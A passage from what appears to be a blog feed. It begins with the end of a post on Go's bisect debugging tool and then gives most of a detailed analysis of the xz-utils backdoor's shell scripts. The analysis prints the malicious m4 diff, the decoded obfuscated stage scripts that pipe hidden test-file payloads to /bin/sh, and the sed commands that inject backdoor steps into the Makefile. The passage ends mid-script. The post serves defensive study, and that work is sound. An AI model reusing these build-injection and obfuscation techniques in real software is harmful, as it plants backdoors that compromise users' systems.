src="hashbisect0.png" srcset="hashbisect0.png 1x, hashbisect0@1.5x.png 1.5x, hashbisect0@2x.png 2x, hashbisect0@3x.png 3x, hashbisect0@4x.png 4x"> <p> FMA is not something most programmers encounter. If they do get an FMA-induced test failure, having a tool that automatically identifies the exact culprit line is invaluable. <a class=anchor href="#use_case"><h2 id="use_case">Use Case: Language Changes</h2></a> <p> The next problem that presented itself was a language change. Go, like C# and JavaScript, learned the hard way that loop-scoped loop variables don’t mix well with closures and concurrency. Like those languages, Go recently changed to <a href="https://go.dev/blog/loopvar-preview">iteration-scoped loop variables</a>, correcting many buggy programs in the process. <p> Unfortunately, sometimes tests unintentionally check for buggy behavior. Deploying the loop change in a large code base, we confronted truly mysterious failures in complex, unfamiliar code. Conditioning the loop change on a suffix of a hash of the source file name and line number enabled bisect-reduce to pinpoint the specific loop or loops that triggered the test failures. We even found a few cases where changing any one loop did not cause a failure, but changing a specific pair of loops did. The generality of finding multiple culprits is necessary in practice. <p> The loop change would have been far more difficult without automated diagnosis. <a class=anchor href="#use_case"><h2 id="use_case">Use Case: Library Changes</h2></a> <p> Bisect-reduce also applies to library changes: we can hash the caller, or more precisely the call stack, and then choose between the old and new implementation based on a hash suffix. <p> For example, suppose you add a new sort implementation and a large program fails. Assuming the sort is correct, the problem is almost certainly that the new sort and the old sort disagree about the final order of some values that compare equal. Or maybe the sort is buggy. Either way, the large program probably calls sort in many different places. Running bisect-reduce over hashes of the call stacks will identify the exact call stack where using the new sort causes a failure. This is what was happening in the example at the start of the post, with a new timer implementation instead of a new sort. <p> Call stacks are a use case that only works with hashing, not with sequential numbering. For the examples up to this point, a setup pass could number all the functions in a program or number all the source lines presented to the compiler, and then bisect-reduce could apply to binary suffixes of the sequence number. But there is no dense sequential numbering of all the possible call stacks a program will encounter. On the other hand, hashing a list of program counters is trivial. <p> We realized that bisect-reduce would apply to library changes around the time we were introducing the <a href="https://go.dev/doc/godebug">GODEBUG mechanism</a>, which provides a framework for tracking and toggling these kinds of compatible-but-breaking changes. We arranged for that framework to provide <code>bisect</code> support for all GODEBUG settings automatically. <p> For Go 1.23, we rewrote the <a href="https://go.dev/pkg/time/#Timer">time.Timer</a> implementation and changed its semantics slightly, to remove some races in existing APIs and also enable earlier garbage collection in some common cases. One effect of the new implementation is that very short timers trigger more reliably. Before, a 0ns or 1ns timer (which are often used in tests) could take many microseconds to trigger. Now, they trigger on time. But of course, buggy code (mostly in tests) exists that fails when the timers start triggering as early as they should. We debugged a dozen or so of these inside Google’s source tree—all of them complex and unfamiliar—and <code>bisect</code> made the process painless and maybe even fun. <p> For one failing test case, I made a mistake. The test looked simple enough to eyeball, so I spent half an hour puzzling through how the only timer in the code under test, a hard-coded one minute timer, could possibly be affected by the new implementation. Eventually I gave up and ran <code>bisect</code>. The stack trace showed immediately that there was a testing middleware layer that was rewriting the one-minute timeout into a 1ns timeout to speed the test. Tools see what people cannot. <a class=anchor href="#interesting_lessons_learned"><h2 id="interesting_lessons_learned">Interesting Lessons Learned</h2></a> <p> One interesting thing we learned while working on <code>bisect</code> is that it is important to try to detect flaky tests. Early in debugging loop change failures, <code>bisect</code> pointed at a completely correct, trivial loop in a cryptography package. At first, we were very scared: if <i>that</i> loop was changing behavior, something would have to be very wrong in the compiler. We realized the problem was flaky tests. A test that fails randomly causes <code>bisect</code> to make a random walk over the source code, eventually pointing a finger at entirely innocent code. After that, we added a <code>-count=N</code> flag to <code>bisect</code> that causes it to run every trial <i>N</i> times and bail out entirely if they disagree. We set the default to <code>-count=2</code> so that <code>bisect</code> always does basic flakiness checking. <p> Flaky tests remain an area that needs more work. If the problem being debugged is that a test went from passing reliably to failing half the time, running <code>go test -count=5</code> increases the chance of failure by running the test five times. Equivalently, it can help to use a tiny shell script like <pre>% cat bin/allpass #!/bin/sh n=$1 shift for i in $(seq $n); do "$@" || exit 1 done </pre> <p> Then <code>bisect</code> can be invoked as: <pre>% bisect -godebug=timer allpass 5 ./flakytest </pre> <p> Now bisect only sees <code>./flakytest</code> passing five times in a row as a successful run. <p> Similarly, if a test goes from passing unreliably to failing all the time, an <code>anypass</code> variant works instead: <pre>% cat bin/anypass #!/bin/sh n=$1 shift for i in $(seq $n); do "$@" &amp;&amp; exit 0 done exit 1 </pre> <p> The <a href="https://man7.org/linux/man-pages/man1/timeout.1.html"><code>timeout</code> command</a> is also useful if the change has made a test run forever instead of failing. <p> The tool-based approach to handling flakiness works decently but does not seem like a complete solution. A more principled approach inside <code>bisect</code> would be better. We are still working out what that would be. <p> Another interesting thing we learned is that when bisecting over run-time changes, hash decisions are made so frequently that it is too expensive to print the full stack trace of every decision made at every stage of the bisect-reduce, (The first run uses an empty suffix that matches every hash!) Instead, bisect hash patterns default to a “quiet” mode where each decision prints only the hash bits, since that’s all <code>bisect</code> needs to guide the search and narrow down the relevant stacks. Once <code>bisect</code> has identified a minimal set of relevant stacks, it runs the test once more with the hash pattern in “verbose” mode. That causes the bisect library to print both the hash bits and the corresponding stack traces, and <code>bisect</code> displays those stack traces in its report. <a class=anchor href="#try_bisect"><h2 id="try_bisect">Try Bisect</h2></a> <p> The <a href="https://pkg.go.dev/golang.org/x/tools/cmd/bisect"><code>bisect</code> tool</a> can be downloaded and used today: <pre>% go install golang.org/x/tools/cmd/bisect@latest </pre> <p> If you are debugging a <a href="https://go.dev/wiki/LoopvarExperiment">loop variable problem</a> in Go 1.22, you can use a command like <pre>% bisect -compile=loopvar go test </pre> <p> If you are debugging a <a href="https://go.dev/change/966609ad9e82ba173bcc8f57f4bfc35a86a62c8a">timer problem in Go 1.23</a>, you can use: <pre>% bisect -godebug asynctimerchan=1 go test </pre> <p> The <code>-compile</code> and <code>-godebug</code> flags are conveniences. The general form of the command is <pre>% bisect [KEY=value...] cmd [args...] </pre> <p> where the leading <code>KEY=value</code> arguments set environment variables before invoking the command with the remaining arguments. <code>Bisect</code> expects to find the literal string <code>PATTERN</code> somewhere on its command line, and it replaces that string with a hash pattern each time it repeats the command. <p> You can use <code>bisect</code> to debug problems in your own compilers or libraries by having them accept a hash pattern either in the environment or on the command line and then print specially formatted lines for <code>bisect</code> on standard output or standard error. The easiest way to do this is to use <a href="https://pkg.go.dev/golang.org/x/tools/internal/bisect">the bisect package</a>. That package is not available for direct import yet (there is a <a href="https://go.dev/issue/67140">pending proposal</a> to add it to the Go standard library), but the package is only a <a href="https://cs.opensource.google/go/x/tools/+/master:internal/bisect/bisect.go">single file with no imports</a>, so it is easily copied into new projects or even translated to other languages. The package documentation also documents the hash pattern syntax and required output format. <p> If you work on compilers or libraries and ever need to debug why a seemingly correct change you made broke a complex program, give <code>bisect</code> a try. It never stops feeling like magic. The xz attack shell script tag:research.swtch.com,2012:research.swtch.com/xz-script 2024-04-02T04:00:00-04:00 2024-04-03T11:02:00-04:00 A detailed walkthrough of the xz attack shell script. <a class=anchor href="#introduction"><h2 id="introduction">Introduction</h2></a> <p> Andres Freund <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">published the existence of the xz attack</a> on 2024-03-29 to the public oss-security@openwall mailing list. The day before, he alerted Debian security and the (private) distros@openwall list. In his mail, he says that he dug into this after “observing a few odd symptoms around liblzma (part of the xz package) on Debian sid installations over the last weeks (logins with ssh taking a lot of CPU, valgrind errors).” <p> At a high level, the attack is split in two pieces: a shell script and an object file. There is an injection of shell code during <code>configure</code>, which injects the shell code into <code>make</code>. The shell code during <code>make</code> adds the object file to the build. This post examines the shell script. (See also <a href="xz-timeline">my timeline post</a>.) <p> The nefarious object file would have looked suspicious checked into the repository as <code>evil.o</code>, so instead both the nefarious shell code and object file are embedded, compressed and encrypted, in some binary files that were added as “test inputs” for some new tests. The test file directory already existed from long before Jia Tan arrived, and the README explained “This directory contains bunch of files to test handling of .xz, .lzma (LZMA_Alone), and .lz (lzip) files in decoder implementations. Many of the files have been created by hand with a hex editor, thus there is no better “source code” than the files themselves.” This is a fact of life for parsing libraries like liblzma. The attacker looked like they were just <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0">adding a few new test files</a>. <p> Unfortunately the nefarious object file turned out to have a bug that caused problems with Valgrind, so the test files needed to be updated to add the fix. <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">That commit</a> explained “The original files were generated with random local to my machine. To better reproduce these files in the future, a constant seed was used to recreate these files.” The attackers realized at this point that they needed a better update mechanism, so the new nefarious script contains an extension mechanism that lets it look for updated scripts in new test files, which wouldn’t draw as much attention as rewriting existing ones. <p> The effect of the scripts is to arrange for the nefarious object file’s <code>_get_cpuid</code> function to be called as part of a <a href="https://sourceware.org/glibc/wiki/GNU_IFUNC">GNU indirect function</a> (ifunc) resolver. In general these resolvers can be called lazily at any time during program execution, but for security reasons it has become popular to call all of them during dynamic linking (very early in program startup) and then map the <a href="https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html">global offset table (GOT) and procedure linkage table (PLT) read-only</a>, to keep buffer overflows and the like from being able to edit it. But a nefarious ifunc resolver would run early enough to be able to edit those tables, and that’s exactly what the backdoor introduced. The resolver then looked through the tables for <code>RSA_public_decrypt</code> and replaced it with a nefarious version that <a href="https://github.com/amlweems/xzbot">runs attacker code when the right SSH certificate is presented</a>. <a class=anchor href="#configure"><h2 id="configure">Configure</h2></a> <p> Again, this post looks at the script side of the attack. Like most complex Unix software, xz-utils uses GNU autoconf to decide how to build itself on a particular system. In ordinary operation, autoconf reads a <code>configure.ac</code> file and produces a <code>configure</code> script, perhaps with supporting m4 files brought in to provide “libraries” to the script. Usually, the <code>configure</code> script and its support libraries are only added to the tarball distributions, not the source repository. The xz distribution works this way too. <p> The attack kicks off with the attacker adding an unexpected support library, <code>m4/build-to-host.m4</code> to the xz-5.6.0 and xz-5.6.1 tarball distributions. Compared to the standard <code>build-to-host.m4</code>, the attacker has made the following changes: <pre>diff --git a/build-to-host.m4 b/build-to-host.m4 index ad22a0a..d5ec315 100644 --- a/build-to-host.m4 +++ b/build-to-host.m4 @@ -1,5 +1,5 @@ -# build-to-host.m4 serial 3 -dnl Copyright (C) 2023 Free Software Foundation, Inc. +# build-to-host.m4 serial 30 +dnl Copyright (C) 2023-2024 Free Software Foundation, Inc. dnl This file is free software; the Free Software Foundation dnl gives unlimited permission to copy and/or distribute it, dnl with or without modifications, as long as this notice is preserved. @@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST], dnl Define somedir_c. gl_final_[$1]="$[$1]" + gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"` dnl Translate it from build syntax to host syntax. case "$build_os" in cygwin*) @@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST], if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then [$1]_c_make='\"$([$1])\"' fi + if test "x$gl_am_configmake" != "x"; then + gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2&gt;/dev/null' + else + gl_[$1]_config='' + fi + _LT_TAGDECL([], [gl_path_map], [2])dnl + _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl + _LT_TAGDECL([], [gl_am_configmake], [2])dnl + _LT_TAGDECL([], [[$1]_c_make], [2])dnl + _LT_TAGDECL([], [gl_[$1]_config], [2])dnl AC_SUBST([$1_c_make]) + + dnl If the host conversion code has been placed in $gl_config_gt, + dnl instead of duplicating it all over again into config.status, + dnl then we will have config.status run $gl_config_gt later, so it + dnl needs to know what name is stored there: + AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2&gt;/dev/null], [gl_config_gt="eval \$gl_[$1]_config"]) ]) dnl Some initializations for gl_BUILD_TO_HOST. AC_DEFUN([gl_BUILD_TO_HOST_INIT], [ + dnl Search for Automake-defined pkg* macros, in the order + dnl listed in the Automake 1.10a+ documentation. + gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2&gt;/dev/null` + if test -n "$gl_am_configmake"; then + HAVE_PKG_CONFIGMAKE=1 + else + HAVE_PKG_CONFIGMAKE=0 + fi + gl_sed_double_backslashes='s/\\/\\\\/g' gl_sed_escape_doublequotes='s/"/\\"/g' + gl_path_map='tr "\t \-_" " \t_\-"' changequote(,)dnl gl_sed_escape_for_make_1="s,\\([ \"&amp;'();&lt;&gt;\\\\\`|]\\),\\\\\\1,g" changequote([,])dnl </pre> <p> All in all, this is a fairly plausible set of diffs, in case anyone thought to check. It bumps the version number, updates the copyright year to look current, and makes a handful of inscrutable changes that don’t look terribly out of place. <p> Looking closer, something is amiss. Starting near the bottom, <pre>gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2&gt;/dev/null` if test -n "$gl_am_configmake"; then HAVE_PKG_CONFIGMAKE=1 else HAVE_PKG_CONFIGMAKE=0 fi </pre> <p> Let’s see which files in the distribution match the pattern (simplifying the <code>grep</code> command): <pre>% egrep -Rn '####[[:alnum:]][[:alnum:]][[:alnum:]][[:alnum:]][[:alnum:]]####$' Binary file ./tests/files/bad-3-corrupt_lzma2.xz matches % </pre> <p> That’s surprising! So this script sets <code>gl_am_configmake=./tests/files/bad-3-corrupt_lzma2.xz</code> and <code>HAVE_PKG_CONFIGMAKE=1</code>. The <code>gl_path_map</code> setting is a <a href="https://linux.die.net/man/1/tr">tr(1)</a> command that swaps tabs and spaces and swaps underscores and dashes. <p> Now reading the top of the script, <pre>gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"` </pre> <p> extracts the final dot-separated element of that filename, leaving <code>xz</code>. That is, it’s the file name suffix, not a prefix, and it is the name of the compression command that is likely already installed on any build machine. <p> The next section is: <pre>if test "x$gl_am_configmake" != "x"; then gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2&gt;/dev/null' else gl_[$1]_config='' fi </pre> <p> We know that <code>gl_am_configmake=./tests/files/bad-3-corrupt_lzma2.xz</code>, so this sets the <code>gl_[$1]_config</code> variable to the string <pre>sed "r\n" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2&gt;/dev/null </pre> <p> At first glance, especially in the original quoted form, the <code>sed</code> command looks like it has something to do with line endings, but in fact <code>r\n</code> is the <code>sed</code> “read from file <code>\n</code>” command. Since the file <code>\n</code> does not exist, the command does nothing at all, and then since <code>sed</code> has not been invoked with the <code>-n</code> option, <code>sed</code> prints each line of input. So <code>sed "r\n"</code> is just an obfuscated <code>cat</code> command, and remember that <code>$gl_path_map</code> is the <code>tr</code> command from before, and <code>$gl_[$1]_prefix</code> is <code>xz</code>. To the shell, this command is really <pre>cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d </pre> <p> But right now it’s still just a string; it hasn’t been run. That changes with <pre>dnl If the host conversion code has been placed in $gl_config_gt, dnl instead of duplicating it all over again into config.status, dnl then we will have config.status run $gl_config_gt later, so it dnl needs to know what name is stored there: AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2&gt;/dev/null], [gl_config_gt="eval \$gl_[$1]_config"]) </pre> <p> The final <code>"eval \$gl_[$1]_config"</code> runs that command. If we run it on the xz 5.6.0 repo, we get: <pre>$ cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d ####Hello#### #��Z�.hj� eval `grep ^srcdir= config.status` if test -f ../../config.status;then eval `grep ^srcdir= ../../config.status` srcdir="../../$srcdir" fi export i="((head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +724)"; (xz -dc $srcdir/tests/files/good-large_compressed.lzma| eval $i|tail -c +31265| tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")| xz -F raw --lzma1 -dc|/bin/sh ####World#### $ </pre> <p> I have inserted some line breaks, here and in later script fragments, to keep the lines from being too long in the web page. <p> Why the Hello and World? The README text that came with the test file describes it:<blockquote> <p> bad-3-corrupt_lzma2.xz has three Streams in it. The first and third streams are valid xz Streams. The middle Stream has a correct Stream Header, Block Header, Index and Stream Footer. Only the LZMA2 data is corrupt. This file should decompress if <code>--single-stream</code> is used.</blockquote> <p> The first and third streams are the Hello and World, and the middle stream has been corrupted by swapping the byte values unswapped by the <code>tr</code> command. <p> Recalling that xz 5.6.1 shipped with different “test” files, we can also try xz 5.6.1: <pre>$ cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d ####Hello#### #�U��$� [ ! $(uname) = "Linux" ] &amp;&amp; exit 0 [ ! $(uname) = "Linux" ] &amp;&amp; exit 0 [ ! $(uname) = "Linux" ] &amp;&amp; exit 0 [ ! $(uname) = "Linux" ] &amp;&amp; exit 0 [ ! $(uname) = "Linux" ] &amp;&amp; exit 0 eval `grep ^srcdir= config.status` if test -f ../../config.status;then eval `grep ^srcdir= ../../config.status` srcdir="../../$srcdir" fi export i="((head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +939)"; (xz -dc $srcdir/tests/files/good-large_compressed.lzma| eval $i|tail -c +31233| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")| xz -F raw --lzma1 -dc|/bin/sh ####World#### $ </pre> <p> The first difference is that the script makes sure (very sure!) to exit if not being run on Linux. The second difference is that the long “<code>export i</code>” line deviates in the final head command offset (724 vs 939) and then the tail offset and the <code>tr</code> argument. Let’s break those down. <p> The <code>head</code> command prints a prefix of its input. Let’s look at the start: <pre>(head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; ... </pre> <p> This discards the first kilobyte of standard input, prints the next two kilobytes, discards the next kilobyte, and prints the next two kilobytes. And so on. The whole command for 5.6.1 is: <pre>(head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; ... 16 times total ... head -c +939 </pre> <p> The shell variable <code>i</code> is set to this long command. Then the script runs: <pre>xz -dc $srcdir/tests/files/good-large_compressed.lzma | eval $i | tail -c +31233 | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" | xz -F raw --lzma1 -dc | /bin/sh </pre> <p> The first <code>xz</code> command uncompresses another malicious test file. The <code>eval</code> then runs the <code>head</code> pipeline, extracting a total of 16×2048+939 = 33,707 bytes. Then the <code>tail</code> command keeps only the final 31,233 bytes. The <code>tr</code> command applies a simple substitution cipher to the output (so that just in case anyone thought to pull these specific byte ranges out of the file, they wouldn’t recognize it as a valid lzma input!?). The second <code>xz</code> command decodes the translated bytes as a raw lzma stream, and then of course the result is piped through the shell. <p> Skipping the shell pipe, we can run this, obtaining a very long shell script. I have added commentary in between sections of the output. <pre>$ xz -dc $srcdir/tests/files/good-large_compressed.lzma | eval $i | tail -c +31233 | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma1 -dc P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections" C="pic_flag=\" $P\"" O="^pic_flag=\" -fPIC -DPIC\"$" R="is_arch_extension_supported" x="__get_cpuid(" p="good-large_compressed.lzma" U="bad-3-corrupt_lzma2.xz" </pre> <p> So far, setting up environment variables. <pre>[ ! $(uname)="Linux" ] &amp;&amp; exit 0 # 5.6.1 only </pre> <p> A line that only appears in 5.6.1, exiting when not run on Linux. In general the scripts in 5.6.0 and 5.6.1 are very similar: 5.6.1 has a few additions. We will examine the 5.6.1 script, with the additions marked. This line is an attempted robustness fix with a bug (pointed out by Jakub Wilk): there are no spaces around the <code>=</code>, making the line a no-op. <pre>eval $zrKcVq </pre> <p> The first of many odd eval statements, for variables that do not appear to be set anywhere. One possibility is that these are debug prints: when the attacker is debugging the script, setting, say, <code>zrKcVq=env</code> inserts a debug print during execution. Another possibility is that these are extension points that can be set by some other mechanism, run before this code, in the future. <pre>if test -f config.status; then eval $zrKcSS eval `grep ^LD=\'\/ config.status` eval `grep ^CC=\' config.status` eval `grep ^GCC=\' config.status` eval `grep ^srcdir=\' config.status` eval `grep ^build=\'x86_64 config.status` eval `grep ^enable_shared=\'yes\' config.status` eval `grep ^enable_static=\' config.status` eval `grep ^gl_path_map=\' config.status` </pre> <p> If <code>config.status</code> exists, we read various variables from it into the shell, along with two extension points. Note that we are still inside the config.status check (let’s call it “if #1”) as we continue through the output. <pre># Entirely new in 5.6.1 vs=`grep -broaF '~!:_ W' $srcdir/tests/files/ 2&gt;/dev/null` if test "x$vs" != "x" &gt; /dev/null 2&gt;&amp;1;then f1=`echo $vs | cut -d: -f1` if test "x$f1" != "x" &gt; /dev/null 2&gt;&amp;1;then start=`expr $(echo $vs | cut -d: -f2) + 7` ve=`grep -broaF '|_!{ -' $srcdir/tests/files/ 2&gt;/dev/null` if test "x$ve" != "x" &gt; /dev/null 2&gt;&amp;1;then f2=`echo $ve | cut -d: -f1` if test "x$f2" != "x" &gt; /dev/null 2&gt;&amp;1;then [ ! "x$f2" = "x$f1" ] &amp;&amp; exit 0 [ ! -f $f1 ] &amp;&amp; exit 0 end=`expr $(echo $ve | cut -d: -f2) - $start` eval `cat $f1 | tail -c +${start} | head -c +${end} | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma2 -dc` fi fi fi fi </pre> <p> This section is entirely new in 5.6.1. It looks for a single test file to contain the magic texts <code>'~!:_ W'</code> and <code>'|_!{ -'</code>, extracts the bytes between them, applies a substitution cipher, decompresses the result, and evaluates the output as a shell script. This appears to be an extension mechanism, so that the next time changes are needed in this script, a new script can be added in a different test file, instead of having to <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">make up reasons to regenerate existing binary test files</a>. <p> The next chunk continues with script that was present in 5.6.0. <pre>eval $zrKccj if ! grep -qs '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' config.status &gt; /dev/null 2&gt;&amp;1;then exit 0 fi if ! grep -qs 'define HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Two different checks that <a href="https://maskray.me/blog/2021-01-18-gnu-indirect-function">GNU indirect function</a> support is enabled. If not, stop the script. The backdoor requires this functionality. <pre>if test "x$enable_shared" != "xyes";then exit 0 fi </pre> <p> Require shared library support. <pre>if ! (echo "$build" | grep -Eq "^x86_64" &gt; /dev/null 2&gt;&amp;1) &amp;&amp; (echo "$build" | grep -Eq "linux-gnu$" &gt; /dev/null 2&gt;&amp;1);then exit 0 fi </pre> <p> Require an x86-64 Linux system. <pre>if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc64_fast.c &gt; /dev/null 2&gt;&amp;1; then exit 0 fi if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc32_fast.c &gt; /dev/null 2&gt;&amp;1; then exit 0 fi if ! grep -qs "$R" $srcdir/src/liblzma/check/crc_x86_clmul.h &gt; /dev/null 2&gt;&amp;1; then exit 0 fi if ! grep -qs "$x" $srcdir/src/liblzma/check/crc_x86_clmul.h &gt; /dev/null 2&gt;&amp;1; then exit 0 fi </pre> <p> Require all the crc ifunc code (in case it has been patched out?). <pre>if test "x$GCC" != 'xyes' &gt; /dev/null 2&gt;&amp;1;then exit 0 fi if test "x$CC" != 'xgcc' &gt; /dev/null 2&gt;&amp;1;then exit 0 fi LDv=$LD" -v" if ! $LDv 2&gt;&amp;1 | grep -qs 'GNU ld' &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Require gcc (not clang, I suppose) and GNU ld. <pre>if ! test -f "$srcdir/tests/files/$p" &gt; /dev/null 2&gt;&amp;1;then exit 0 fi if ! test -f "$srcdir/tests/files/$U" &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Require the backdoor-containing test files. Of course, if these files didn’t exist, it’s unclear how we obtained this script in the first place, but better safe than sorry, I suppose. <pre>if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then eval $zrKcst </pre> <p> Add a bunch of checks when the file <code>debian/rules</code> exists or <code>$RPM_ARCH</code> is set to <code>x86_64</code>. Note that we are now inside two <code>if</code> statements: the <code>config.status</code> check above, and this one (let’s call it “if #2”). <pre>j="^ACLOCAL_M4 = \$(top_srcdir)\/aclocal.m4" if ! grep -qs "$j" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi z="^am__uninstall_files_from_dir = {" if ! grep -qs "$z" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi w="^am__install_max =" if ! grep -qs "$w" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi E=$z if ! grep -qs "$E" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi Q="^am__vpath_adj_setup =" if ! grep -qs "$Q" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi M="^am__include = include" if ! grep -qs "$M" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi L="^all: all-recursive$" if ! grep -qs "$L" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi m="^LTLIBRARIES = \$(lib_LTLIBRARIES)" if ! grep -qs "$m" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi u="AM_V_CCLD = \$(am__v_CCLD_\$(V))" if ! grep -qs "$u" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Check that <code>liblzma/Makefile</code> contains all the lines that will be used as anchor points later for inserting new text into the Makefile. <pre>if ! grep -qs "$O" libtool &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> <code>$O</code> was set at the very start of the script. This is checking that the libtool file, presumably generated during the build process, configures the compiler for a PIC (position independent code) build. <pre>eval $zrKcTy b="am__test = $U" </pre> <p> <code>$U</code> was also set at the start of the script: <code>U="bad-3-corrupt_lzma2.xz"</code>. Real work is starting! <pre>sed -i "/$j/i$b" src/liblzma/Makefile || true </pre> <p> <code>sed -i</code> runs an in-place modification of the input file, in this case <code>liblzma/Makefile</code>. Specifically, find the <code>ACLOCAL_M4</code> line we grepped for earlier (<code>/$j/</code>) and insert the <code>am__test</code> setting from <code>$b</code> (<code>i$b</code>). <pre>d=`echo $gl_path_map | sed 's/\\\/\\\\\\\\/g'` b="am__strip_prefix = $d" sed -i "/$w/i$b" src/liblzma/Makefile || true </pre> <p> Shell quoting inside a quoted string inside a Makefile really is something special. This is escaping the backslashes in the tr command enough times that it will work to insert them into the Makefile after the <code>am__install_max</code> line (<code>$w</code>). <pre>b="am__dist_setup = \$(am__strip_prefix) | xz -d 2&gt;/dev/null | \$(SHELL)" sed -i "/$E/i$b" src/liblzma/Makefile || true b="\$(top_srcdir)/tests/files/\$(am__test)" s="am__test_dir=$b" sed -i "/$Q/i$s" src/liblzma/Makefile || true </pre> <p> 